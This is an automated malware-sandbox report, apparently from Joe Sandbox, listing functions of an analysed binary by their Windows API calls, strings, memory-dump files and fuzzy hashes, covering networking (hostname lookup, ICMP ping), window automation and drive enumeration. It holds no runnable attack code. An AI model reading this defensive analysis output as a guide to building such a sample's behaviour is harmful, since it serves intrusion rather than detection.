gethostname.WSOCK32(?,00000100), ref: 006446EC
gethostbyname.WSOCK32(?), ref: 006446F9
_wcscpy.LIBCMT ref: 00644721
_memmove.LIBCMT ref: 00644734
inet_ntoa.WSOCK32(?), ref: 0064473F
_strcat.LIBCMT ref: 0064474D
_wcscpy.LIBCMT ref: 00644764
WSACleanup.WSOCK32 ref: 00644772
_wcscpy.LIBCMT ref: 00644780

Strings

0.0.0.0, xrefs: 0064471B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 63695757502a341ce4da1daf6bc279dcdc0fc311cacd2627b35a689e2bb49dff
Instruction ID: 6682cd3297443b744ac1b1183959f03035370ea4b582309421a945b64ec10bc9
Opcode Fuzzy Hash: 63695757502a341ce4da1daf6bc279dcdc0fc311cacd2627b35a689e2bb49dff
Instruction Fuzzy Hash: B2110231504105AFDB28AB30AC4AFEB77BEEF02311F0001BAF54596191EFB19E828A54

Function 00644F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00644F7A

Part of subcall function 0060049F: timeGetTime.WINMM(?,75A8B400,005F0E7B), ref: 006004A3

Sleep.KERNEL32(0000000A), ref: 00644FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00644FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00644FEC
SetActiveWindow.USER32 ref: 0064500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00645019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00645038
Sleep.KERNEL32(000000FA), ref: 00645043
IsWindow.USER32 ref: 0064504F
EndDialog.USER32(00000000), ref: 00645060

Strings

BUTTON, xrefs: 00644FDE

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: f61f903f6734971447757984f52585eccc14791949be5e20d1633b2bc194f2ee
Instruction ID: 11010adacb0bc7c3b7767db4fb90687f5198adb7589de454024e87f6c55a9040
Opcode Fuzzy Hash: f61f903f6734971447757984f52585eccc14791949be5e20d1633b2bc194f2ee
Instruction Fuzzy Hash: B1216F74604605BFE7507F60FC89B663BABEB56745F093028F102822B2CBA1AD54CA71

Function 0064D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

CoInitialize.OLE32(00000000), ref: 0064D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0064D67D
SHGetDesktopFolder.SHELL32(?), ref: 0064D691
CoCreateInstance.OLE32(00672D7C,00000000,00000001,00698C1C,?), ref: 0064D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0064D74C
CoTaskMemFree.OLE32(?,?), ref: 0064D7A4
_memset.LIBCMT ref: 0064D7E1
SHBrowseForFolderW.SHELL32(?), ref: 0064D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0064D840
CoTaskMemFree.OLE32(00000000), ref: 0064D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0064D87E
CoUninitialize.OLE32(00000001,00000000), ref: 0064D880

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 9e0cf7dc21879faadb031a87afed1a4ce8c19f99bb23960a8a2ef53b39d03a3c
Instruction ID: 4263871c5e225ac3e53de86e360918fd5ff3f7484655315be200908317c55287
Opcode Fuzzy Hash: 9e0cf7dc21879faadb031a87afed1a4ce8c19f99bb23960a8a2ef53b39d03a3c
Instruction Fuzzy Hash: EFB1CA75A00109AFDB04DFA5D888DAEBBB9FF48314F1484A9F909DB261DB70ED45CB50

Function 0063C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0063C283
GetWindowRect.USER32(00000000,?), ref: 0063C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0063C2F3
GetDlgItem.USER32(?,00000002), ref: 0063C2FE
GetWindowRect.USER32(00000000,?), ref: 0063C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0063C364
GetDlgItem.USER32(?,000003E9), ref: 0063C372
GetWindowRect.USER32(00000000,?), ref: 0063C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0063C3C6
GetDlgItem.USER32(?,000003EA), ref: 0063C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0063C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0063C3FE

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 8134bafb133f67c7116accc37d12b036266be4845fce8e0a29b7d2c07fac7304
Instruction ID: 9f089c79e0a7a52afd963069006f02775708817beb2b428681a6abbd110ecfa8
Opcode Fuzzy Hash: 8134bafb133f67c7116accc37d12b036266be4845fce8e0a29b7d2c07fac7304
Instruction Fuzzy Hash: 38513271B00205AFDB18CFA9ED99AAEBBB6FB88711F14812DF515E7390D7B19D008B50

Function 005E201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 005E1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005E2036,?,00000000,?,?,?,?,005E16CB,00000000,?), ref: 005E1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005E20D3
KillTimer.USER32(-00000001,?,?,?,?,005E16CB,00000000,?,?,005E1AE2,?,?), ref: 005E216E
DestroyAcceleratorTable.USER32(00000000), ref: 0061BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005E16CB,00000000,?,?,005E1AE2,?,?), ref: 0061BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005E16CB,00000000,?,?,005E1AE2,?,?), ref: 0061BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005E16CB,00000000,?,?,005E1AE2,?,?), ref: 0061BD0A
DeleteObject.GDI32(00000000), ref: 0061BD1C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: a4d0684c51a6d21781de0f05ed532c19a277053353a3bff670ccd565110708c3
Instruction ID: 14b1b28d8a925c99eae0254ddcbbfa9bfc184c7038c6ed4fb8ffbfd8353d7fa8
Opcode Fuzzy Hash: a4d0684c51a6d21781de0f05ed532c19a277053353a3bff670ccd565110708c3
Instruction Fuzzy Hash: 14618D31500A50DFCB29EF16E948B697BF7FF41312F14A528E093966A4C7B4A980DF90

Function 005E21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 005E25DB: GetWindowLongW.USER32(?,000000EB), ref: 005E25EC

GetSysColor.USER32(0000000F), ref: 005E21D3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 16d911de426de318c96d16e5f6c5f5c5a4872c27cf11ef1598ef36c09a1d5d6c
Instruction ID: 97e2f906fc380baedb68eac51cdf8470a51c889f1d2554af8daa32bf616be91f
Opcode Fuzzy Hash: 16d911de426de318c96d16e5f6c5f5c5a4872c27cf11ef1598ef36c09a1d5d6c
Instruction Fuzzy Hash: 2341C635000180DFDB295F29EC88BF93B6AFB06371F185265FEA58A1E9C7718C41DB61

Function 0064A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0066F910), ref: 0064A90B
GetDriveTypeW.KERNEL32(00000061,006989A0,00000061), ref: 0064A9D5
_wcscpy.LIBCMT ref: 0064A9FF

Strings

fixed, xrefs: 0064A953
all, xrefs: 0064A911
unknown, xrefs: 0064A996
removable, xrefs: 0064A93D
cdrom, xrefs: 0064A927
ramdisk, xrefs: 0064A97F
network, xrefs: 0064A969

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 930f142b71e313da21ddf7a9c71a0dd998d2b4f195147a989a215c9831d0187d
Instruction ID: c67093906c8297bf0ad5ca2e96fdf5a4485a5be67515856640d1483a33bfef20
Opcode Fuzzy Hash: 930f142b71e313da21ddf7a9c71a0dd998d2b4f195147a989a215c9831d0187d
Instruction Fuzzy Hash: 1251C031158341AFC708EF54C996AAFBBAAFF85304F14482DF495972E2DB319D09CA83

Function 005E9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 005E9862
__swprintf.LIBCMT ref: 005E98AC
__i64tow.LIBCMT ref: 0061F5E6

Strings

%.15g, xrefs: 005E98A6
0x%p, xrefs: 0061F5C8
False, xrefs: 0061F5AE
True, xrefs: 0061F5A7

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: a6670249eeaeb448ecb1000d84114c5d17d5266d1280dc6c07c6ff3eb60ab193
Instruction ID: e575e0d3f6c067bb2f1ac40851ecc05ed303b2c558910df58a7b835de11918f4
Opcode Fuzzy Hash: a6670249eeaeb448ecb1000d84114c5d17d5266d1280dc6c07c6ff3eb60ab193
Instruction Fuzzy Hash: E841E571504205AFEB28DF35D846EBA77EBFF46300F24487EE589D7392EA3199428B10

Function 00667152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0066716A
CreateMenu.USER32 ref: 00667185
SetMenu.USER32(?,00000000), ref: 00667194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00667221
IsMenu.USER32(?), ref: 00667237
CreatePopupMenu.USER32 ref: 00667241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0066726E
DrawMenuBar.USER32 ref: 00667276

Strings

F, xrefs: 00667262
0, xrefs: 00667160

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: c1a0fd75a1914aa030da055a10bc34e5c726f9548c612b9d8469bbaced023453
Instruction ID: 09828f2c9d5404f1951d66985fb7e3b600df2bca72b1ec2e5e98bacdd6de7007
Opcode Fuzzy Hash: c1a0fd75a1914aa030da055a10bc34e5c726f9548c612b9d8469bbaced023453
Instruction Fuzzy Hash: FB414774A01205EFDB10DF64E894E9ABBBAFF49314F144029F906A7361D771AE14CF90

Function 006674BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0066755E
CreateCompatibleDC.GDI32(00000000), ref: 00667565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00667578
SelectObject.GDI32(00000000,00000000), ref: 00667580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0066758B
DeleteDC.GDI32(00000000), ref: 00667594
GetWindowLongW.USER32(?,000000EC), ref: 0066759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006675B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006675BE

Strings

static, xrefs: 006674F6

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 3a2db5afe135568fb8f425c32bd8a29694cd97eed86f0b36a84a4865776cce2a
Instruction ID: 17551e8083b5ef40b70d3226ac7ec2f045070342c214b70191e3c67f357bf53a
Opcode Fuzzy Hash: 3a2db5afe135568fb8f425c32bd8a29694cd97eed86f0b36a84a4865776cce2a
Instruction Fuzzy Hash: B3316D72104215BBDF119F64EC08FDA3B6AFF09765F111228FA16E61A0DB71D821DBA4

Function 00606E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00606E3E

Part of subcall function 00608B28: __getptd_noexit.LIBCMT ref: 00608B28

__gmtime64_s.LIBCMT ref: 00606ED7
__gmtime64_s.LIBCMT ref: 00606F0D
__gmtime64_s.LIBCMT ref: 00606F2A
__allrem.LIBCMT ref: 00606F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00606F9C
__allrem.LIBCMT ref: 00606FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00606FD1
__allrem.LIBCMT ref: 00606FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00607006
__invoke_watson.LIBCMT ref: 00607077

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 856a654931c5a5bea91bbdafe4828d2b7ed08caebbeb58ee3b211aa9e1287d6f
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 7471F3B2E80717ABD718AE68DC41B9BB3AAAF04324F14822DF515E73C1E770ED508794

Function 00642527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00642542
GetMenuItemInfoW.USER32(006A5890,000000FF,00000000,00000030), ref: 006425A3
SetMenuItemInfoW.USER32(006A5890,00000004,00000000,00000030), ref: 006425D9
Sleep.KERNEL32(000001F4), ref: 006425EB
GetMenuItemCount.USER32(?), ref: 0064262F
GetMenuItemID.USER32(?,00000000), ref: 0064264B
GetMenuItemID.USER32(?,-00000001), ref: 00642675
GetMenuItemID.USER32(?,?), ref: 006426BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00642700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00642714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00642735

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 72c301be1ab02c7cea50da4ec4d265e9e3552aea5b8d60ac78324b2342e1e13a
Instruction ID: 688bed4e1f5fe6a8d7c503e83fe147c47d4e92d4dd208eacda4b0f272d755972
Opcode Fuzzy Hash: 72c301be1ab02c7cea50da4ec4d265e9e3552aea5b8d60ac78324b2342e1e13a
Instruction Fuzzy Hash: 6D61907090024AAFDB11DF64DCA8EFEBBBAFB45304FA40059F842A7251D771AD45DB21

Function 00666F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00666FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00666FA8
GetWindowLongW.USER32(?,000000F0), ref: 00666FCC
_memset.LIBCMT ref: 00666FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00666FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00667067

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 1661d7ffc99e00f56b809f296197b50bbcde690b1be30fc0c40fc629ef821c6c
Instruction ID: b9bc2cd2af58450ef9c268dce22400674e01eea986461a855c2aec1bb9e7e711
Opcode Fuzzy Hash: 1661d7ffc99e00f56b809f296197b50bbcde690b1be30fc0c40fc629ef821c6c
Instruction Fuzzy Hash: 09617B75900208AFDB10DFA4CC81EEE77BAAB09714F14419AFA15AB3A1C771AD45DFA0

Function 00636B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00636BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00636C18
VariantInit.OLEAUT32(?), ref: 00636C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00636C4A
VariantCopy.OLEAUT32(?,?), ref: 00636C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00636CB1
VariantClear.OLEAUT32(?), ref: 00636CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00636CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00636CDC
VariantClear.OLEAUT32(?), ref: 00636CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00636CF9

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 45da5f70336cecdce869a2a6fdade1438967945baac1b18cf14e953195a0f563
Instruction ID: 599383ebff29755799ac1d92bdf146de76cd320345374f9249f183c2b1c603a7
Opcode Fuzzy Hash: 45da5f70336cecdce869a2a6fdade1438967945baac1b18cf14e953195a0f563
Instruction Fuzzy Hash: 27415D71A00219AFCB04DFA9D8489AEBBFAFF48350F00C069F955E7261CB71A945CF90

Function 00655732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00655793
inet_addr.WSOCK32(?,?,?), ref: 006557D8
gethostbyname.WSOCK32(?), ref: 006557E4
IcmpCreateFile.IPHLPAPI ref: 006557F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00655862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00655878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 006558ED
WSACleanup.WSOCK32 ref: 006558F3

Strings

Ping, xrefs: 00655816

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
